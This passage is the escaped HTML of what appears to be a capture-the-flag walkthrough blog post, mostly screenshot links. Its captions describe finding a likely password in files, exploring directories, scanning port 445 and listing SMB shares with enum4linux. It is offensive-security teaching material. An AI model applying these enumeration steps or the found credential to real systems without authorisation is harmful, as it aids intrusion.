/&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading some of the files we don&#39;t find anything interesting:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2BwpjtsMDdcl1CsDeozTRsZ1fpAmEulL6qAWM0TvOnsEddE2-T9tdGgO0QJZCHir0NG-s9NLZEd2mUL0A45rnize7pA-kBml5NU_SBQejbmWmB0KrBrMzcGCVzRuEaBo2jPel1xLtAJsT/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;44&quot; data-original-width=&quot;445&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2BwpjtsMDdcl1CsDeozTRsZ1fpAmEulL6qAWM0TvOnsEddE2-T9tdGgO0QJZCHir0NG-s9NLZEd2mUL0A45rnize7pA-kBml5NU_SBQejbmWmB0KrBrMzcGCVzRuEaBo2jPel1xLtAJsT/s16000/screenshot.7.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg18SYTZLMS8eIiTSChSasiXzevQ_2YTokiH60I8NwQillUFDyaRFqDGRT7Ji4_kbyvd9cLZ9jZIEz4gOxTEXIEqEZBN3FYDtfo-LXx2e_ugACJGrXqYIvbdyYcs7SJy1rFW7aePGoK-HX6/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;45&quot; data-original-width=&quot;564&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg18SYTZLMS8eIiTSChSasiXzevQ_2YTokiH60I8NwQillUFDyaRFqDGRT7Ji4_kbyvd9cLZ9jZIEz4gOxTEXIEqEZBN3FYDtfo-LXx2e_ugACJGrXqYIvbdyYcs7SJy1rFW7aePGoK-HX6/s16000/screenshot.8.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDEdVkhn490COrNv625kRHVnQ2rWhmyH4lc2j_JsYP0jDyE_D31rBXyM4Iyezp8vWy-b5KsD_0KG_pVY9FT5Fs_aBVRNSbyHzEhyphenhyphengLG86S3XemB9vUD7s0tiFZwrNlwEdfhbTsPvUkM7cr/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;44&quot; data-original-width=&quot;413&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDEdVkhn490COrNv625kRHVnQ2rWhmyH4lc2j_JsYP0jDyE_D31rBXyM4Iyezp8vWy-b5KsD_0KG_pVY9FT5Fs_aBVRNSbyHzEhyphenhyphengLG86S3XemB9vUD7s0tiFZwrNlwEdfhbTsPvUkM7cr/s16000/screenshot.9.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- However this two files seem to suggest that the string&amp;nbsp;&lt;b&gt;qwertyuioplkjhgfdsazxcvbnm&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;could be a valid password:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCJ2KQGvx_D5md_G3b6ueizeMdrApLALyB540_AJGe3da82R_7bEElbVR-zxS9ajVRcGBkdPrxbiG359Gdw62qGOByjgIXm-BjXrzmXjyZA63gXSx2DuXDu5kl_T3DQROPsqge6n1OP9be/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;47&quot; data-original-width=&quot;1147&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCJ2KQGvx_D5md_G3b6ueizeMdrApLALyB540_AJGe3da82R_7bEElbVR-zxS9ajVRcGBkdPrxbiG359Gdw62qGOByjgIXm-BjXrzmXjyZA63gXSx2DuXDu5kl_T3DQROPsqge6n1OP9be/s16000/screenshot.10.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB-vtZGsYVZ6fFEnJr3w-pmFGYnVDTDrF3tOCpWh3R_UqxLVw2yUR-0_ilddMjwSFw471h1ijRFan5-Rplt70ns79SwRc9MNt-FJ-gIPBZHgoF5pl2fic0DCHHvN4giiRBqmw-S43asPwz/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;46&quot; data-original-width=&quot;734&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB-vtZGsYVZ6fFEnJr3w-pmFGYnVDTDrF3tOCpWh3R_UqxLVw2yUR-0_ilddMjwSFw471h1ijRFan5-Rplt70ns79SwRc9MNt-FJ-gIPBZHgoF5pl2fic0DCHHvN4giiRBqmw-S43asPwz/s16000/screenshot.11.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Going inside directory &lt;b&gt;itinerary&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBcNPsgcycgeCNufhKjkD1J5e2TES9rBTVtb0JH47iJB9Iy9vOPAq1mkLz558MnhrtynJgvRxuXVZ2f-8Zhd9x2pneiabyx1LVF4ocXP8B5hHL7Owwty3j2S5LPHl044mrYGRjesatzOz5/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;138&quot; data-original-width=&quot;581&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBcNPsgcycgeCNufhKjkD1J5e2TES9rBTVtb0JH47iJB9Iy9vOPAq1mkLz558MnhrtynJgvRxuXVZ2f-8Zhd9x2pneiabyx1LVF4ocXP8B5hHL7Owwty3j2S5LPHl044mrYGRjesatzOz5/s16000/screenshot.12.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Exploring &lt;b&gt;david&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKraLREC7yB0jtxgn6TNHY_jMSsSc6BZ8bqsDMTu0Izaf-so_zm5f6Fu8bUS6BrJJlyoFeVeC-PQfM95Mw8Yd6-o0Oaw030tHFJuylzzbZ-IQmjoAzI0R4pXoge1V3zDRQfzYayESwqLRp/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;399&quot; data-original-width=&quot;962&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKraLREC7yB0jtxgn6TNHY_jMSsSc6BZ8bqsDMTu0Izaf-so_zm5f6Fu8bUS6BrJJlyoFeVeC-PQfM95Mw8Yd6-o0Oaw030tHFJuylzzbZ-IQmjoAzI0R4pXoge1V3zDRQfzYayESwqLRp/s16000/screenshot.13.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning port 445 deeper:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGM-Mr3rooOgoD1Od_SszMOCf90AaECWSeUc9N1pRdHsWQpLxv3IdHVvxvvwm7duTijov0t-SUbcETOn7QrwL90W6Xb2y9td4EeCXW-z6xVUcAT6N0klC6T-umCvGrZ4uk3e2k6dSXNDEj/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;785&quot; data-original-width=&quot;717&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGM-Mr3rooOgoD1Od_SszMOCf90AaECWSeUc9N1pRdHsWQpLxv3IdHVvxvvwm7duTijov0t-SUbcETOn7QrwL90W6Xb2y9td4EeCXW-z6xVUcAT6N0klC6T-umCvGrZ4uk3e2k6dSXNDEj/s16000/screenshot.18.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;- &lt;/span&gt;&lt;b style=&quot;font-family: arial; font-size: large;&quot;&gt;enum4linux&lt;/b&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt; discovers two shared folders, &lt;/span&gt;&lt;b style=&quot;font-family: arial; font-size: large;&quot;&gt;anonymous&lt;/b&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt; and &lt;/span&gt;&lt;b style=&quot;font-family: arial; font-size: large;&quot;&gt;secured&lt;/b&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiOxzcoDod63WnzrP9P_2t1KMXps4mjpTJHX_itUI-2qitfqOApr1YBOdhJe_4NJJOMQuAJsIhJocu18u2dCKA7vjfWLFxr80hiZI45bw2BCG06p2D_l6tNnCDP2kz74TaG66hXLTr-mzZ/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;23&quot; data-original-width=&quot;531&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiOxzcoDod63WnzrP9P_2t1KMXps4mjpTJHX_itUI-2qitfqOApr1YBOdhJe_4NJJOMQuAJsIhJocu18u2dCKA7vjfWLFxr80hiZI45bw2BCG06p2D_l6tNnCDP2kz74TaG66hXLTr-mzZ/s16000/screenshot.14.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE-wqjxEemQakR1A8F-WHUSwBwbzyrAsNboKask0dm3dDTZhX2yyWf2I-CehvMSnbWT4E-8Fx9YOWi81mt7LPycSVP-QvzFvQ8vwxO1q52jlVHJyP5Mo1-4rz1KmbXRTdHkX8_wvs1zDs0/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;750&quot; data-original-width=&quot;855&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiE-wqjxEemQakR1A8F-WHUSwBwbzyrAsNboKask0dm3dDTZhX2yyWf2I-CehvMSnbWT4E-8Fx9YOWi81mt7LPycSVP-QvzFvQ8vwxO1q52jlVHJyP5Mo1-4rz1KmbXRTdHkX8_wvs1zDs0/s16000/screenshot.15.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 